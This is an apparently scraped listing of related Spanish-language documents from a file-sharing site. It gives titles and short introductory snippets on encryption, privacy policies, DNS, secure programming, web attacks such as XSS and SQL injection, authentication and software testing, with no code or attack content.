Preguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información

Preguntas y respuestas sobre el cifrado de la información personal. La guía para aprender a cifrar tu información Guía de Cifrado Preguntas y respuestas sobre el cifrado de la información personal La guía para aprender a cifrar tu información 2 Qué es lo que estamos cuidando? A través del cifrado cuidamos de fotos,

Más detalles

Capítulo VI. Conclusiones. En este capítulo abordaremos la comparación de las características principales y

Capítulo VI. Conclusiones. En este capítulo abordaremos la comparación de las características principales y Capítulo VI Conclusiones En este capítulo abordaremos la comparación de las características principales y de las ventajas cada tecnología Web nos ofrece para el desarrollo de ciertas aplicaciones. También

Más detalles

Qué necesito saber para tener mi sitio web en Internet?

Qué necesito saber para tener mi sitio web en Internet? Qué necesito saber para tener mi sitio web en Internet? Introducción Antes es importante tener en cuenta que Es importante considerar lo siguiente: Definir claramente tu actividad en Internet Establecer

Más detalles

Políticas y Seguridad de la Información ECR EVALUADORA PREFIN S.A

Políticas y Seguridad de la Información ECR EVALUADORA PREFIN S.A Políticas y Seguridad de la Información ECR EVALUADORA PREFIN S.A 1 VERSIÓN 01 PREFIN S.A. 11 Mayo 2014 INDICE 1. INTRODUCCION.3 2. OBJETIVOS.3 3. PLANES DE CONTINGENCIA 3 4. SEGURIDAD DE DATOS PLATAFORMA

Más detalles

DECLARACIÓN DE PRIVACIDAD DE FONOWEB

DECLARACIÓN DE PRIVACIDAD DE FONOWEB DECLARACIÓN DE PRIVACIDAD DE FONOWEB Fonoweb se compromete a respetar su privacidad y la confidencialidad de su información personal, los datos de las comunicaciones y el contenido de las comunicaciones

Más detalles

Anexos de Bases de Presentación de Propuestas. Consultoría para la implementación de sistemas de gestión de contenidos para comunidades de RedCLARA

Anexos de Bases de Presentación de Propuestas. Consultoría para la implementación de sistemas de gestión de contenidos para comunidades de RedCLARA Anexos de Bases de Presentación de Propuestas Consultoría para la implementación de sistemas de gestión de contenidos para comunidades de RedCLARA Julio 2011 Anexo A. Requisitos funcionales A1. Para el

Más detalles

JAVA EE 5. Arquitectura, conceptos y ejemplos.

JAVA EE 5. Arquitectura, conceptos y ejemplos. JAVA EE 5. Arquitectura, conceptos y ejemplos. INTRODUCCIÓN. MODELO DE LA APLICACIÓN JEE5. El modelo de aplicación Java EE define una arquitectura para implementar servicios como lo hacen las aplicaciones

Más detalles

Proceso de resolución de un nombre de dominio. Javier Rodríguez Granados

Proceso de resolución de un nombre de dominio. Javier Rodríguez Granados Proceso de resolución de un nombre de dominio. Javier Rodríguez Granados Proceso de resolución de un nombre de dominio. La resolución de un nombre de dominio es la traducción de un FQDN a su correspondiente

Más detalles

Manual Básico de Helm 4.2 para Usuarios:

Manual Básico de Helm 4.2 para Usuarios: Manual Básico de Helm 4.2 para Usuarios: Ante todo queremos agradecerle por elegir a para trabajar junto a usted. Esperamos que este manual lo ayude a trabajar con comodidad y facilidad. Este manual es

Más detalles

Seguridad en la red. Fuga o robo de información a causa de las siguientes razones:

Seguridad en la red. Fuga o robo de información a causa de las siguientes razones: Seguridad en la red A continuación se presentan algunos de los riesgos inherentes al medio de comunicación, cuya mitigación dependerá del uso adecuado que el suscriptor le dé a su equipo terminal móvil:

Más detalles

Resumen de los protocolos de seguridad del Registro Telemático

Resumen de los protocolos de seguridad del Registro Telemático Resumen de los protocolos de seguridad del Registro Telemático Página 1 de 8 1 Introducción... 3 2 Criterios de... 4 2.1 Gestión global de la seguridad... 4 2.2 Política de seguridad... 4 2.2.1 Autenticidad...

Más detalles

Programación de código seguro

Programación de código seguro Programación de código seguro Distinción de vulnerabilidades Stack OverFlow y Heap OverFlow Comunes en lenguajes y aplicaciones de escritorio TOP 10 OWASP Muchas otras Stack OverFlow Stack OverFlow: Ejemplo

Más detalles

SISTEMA DE PAPELES DE TRABAJO PARA AUDITORÍA SPT AUDIT

SISTEMA DE PAPELES DE TRABAJO PARA AUDITORÍA SPT AUDIT SISTEMA DE PAPELES DE TRABAJO PARA AUDITORÍA SPT AUDIT INTRODUCCIÓN La documentación de auditoría ó papeles de trabajo son el respaldo que tiene el auditor para registrar los procedimientos aplicados,

Más detalles

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS

INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS INTRODUCCIÓN A LA SEGURIDAD EN SISTEMAS Y WEBS Marco A. Lozano Merino Mayo 2012 Índice 1.Seguridad a nivel de usuario 1.Amenazas y protección 2.La realidad de la seguridad: hackers 3.Seguridad en redes

Más detalles

ATAQUE Y CONTRAMEDIAS

ATAQUE Y CONTRAMEDIAS Unidad 3 4-5 3. AUTENTICACIÓN 4. CONTROL DE ACCESO 5. ATAQUE Y CONTRAMEDIAS jun-10 M.C. Gustavo A. Gutiérrez Carreón DEFINICIÓN AUTENTICACIÓN Autenticación o autentificación es el acto de establecimiento

Más detalles

REQUERIMIENTOS HARDWARE Y SOFTWARE QWEBDOCUMENTS VERSION 4

REQUERIMIENTOS HARDWARE Y SOFTWARE QWEBDOCUMENTS VERSION 4 Pág. 1 de 6 Ambiente centralizado SERVIDOR UNICO Servidor Hardware Procesador CORE Duo 4 GHz Memoria Ram 4 GB. 2 GB solo para la aplicación y los otros 2 GB para Base de datos, S.O y otro software necesario

Más detalles

Entidad Formadora: Plan Local De Formación Convocatoria 2010

Entidad Formadora: Plan Local De Formación Convocatoria 2010 Entidad Formadora: Enterprise Architect Comenzando Puede iniciar Enterprise Architect desde el ícono que se creó en su escritorio de Windows durante la instalación, o alternativamente: 1. Abrir el menú

Más detalles

computadoras que tienen este servicio instalado se pueden publicar páginas web tanto local como remotamente.

computadoras que tienen este servicio instalado se pueden publicar páginas web tanto local como remotamente. Investigar Qué es un IIS? Internet Information Services o IIS es un servidor web y un conjunto de servicios para el sistema operativo Microsoft Windows. Originalmente era parte del Option Pack para Windows

Más detalles

PRUEBAS DE SOFTWARE TECNICAS DE PRUEBA DE SOFTWARE

PRUEBAS DE SOFTWARE TECNICAS DE PRUEBA DE SOFTWARE PRUEBAS DE SOFTWARE La prueba del software es un elemento crítico para la garantía de la calidad del software. El objetivo de la etapa de pruebas es garantizar la calidad del producto desarrollado. Además,

Más detalles

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen

Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y Defensa. my kung fu is stronger than yours, The lone Gunmen Web: Ataque y defensa Introducción. Cross Site Scripting (XSS). SQL Injection. Programador? quien yo?. Ataques NG. Prevención.

Más detalles

Fundamentos de programación Estudia las estructuras de control y cómo definir funciones en JavaScript.

Fundamentos de programación Estudia las estructuras de control y cómo definir funciones en JavaScript. Descripción: Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología ASP.NET y el servidor

Más detalles

Configuración de Aspel-SAE 6.0 para trabajar Remotamente

Configuración de Aspel-SAE 6.0 para trabajar Remotamente Configuración de Aspel-SAE 6.0 para trabajar Remotamente Para poder configurar Aspel-SAE 6.0 como Servidor Remoto, se necesita realizar lo siguiente: 1. Instalar y/o configurar el IIS que se tenga de acuerdo

Más detalles

Seguridad en la transmisión de Datos

Seguridad en la transmisión de Datos Seguridad en la transmisión de Datos David Peg Montalvo Santiago de Compostela Noviembre 2005 Índice 01 Seguridad. Ámbito de aplicación 02 Control de acceso 03 Conceptos básicos de criptografía 04 PKI

Más detalles